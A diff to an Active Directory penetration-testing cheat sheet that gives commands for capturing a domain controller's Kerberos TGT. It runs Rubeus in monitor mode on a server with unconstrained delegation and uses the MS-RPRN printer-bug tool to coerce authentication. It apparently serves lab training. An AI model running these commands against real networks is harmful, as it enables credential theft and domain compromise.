nicolagatta/Cheat-Sheet---Active-Directory/README.md

 # What if the third server is an owned computer trusted for delegation?
 # it sohuld be possible to capture the DC TGT

-# On the trusted server, use rubeus in monitor mode to listen for incoming tickets
+# On the server with unconstrained delegation enabled (dcorp-appsrv), run rubeus in monitor mode to listen for incoming tickets
 .\Rubeus.exe monitor /interval:5 /nowrap

-# from a domain joined machine ask to a DC to notify MS-RPRN to the owned server:
+# from a domain joined machine ask to a DC to notify MS-RPRN to the server:
 .\MS-RPRN.exe \\dcorp.corp.corporate.local \\dcorp-appsrv.corp.corporate.local

 # some tickets will be printed by the rubeus session monitor mode in base64 format.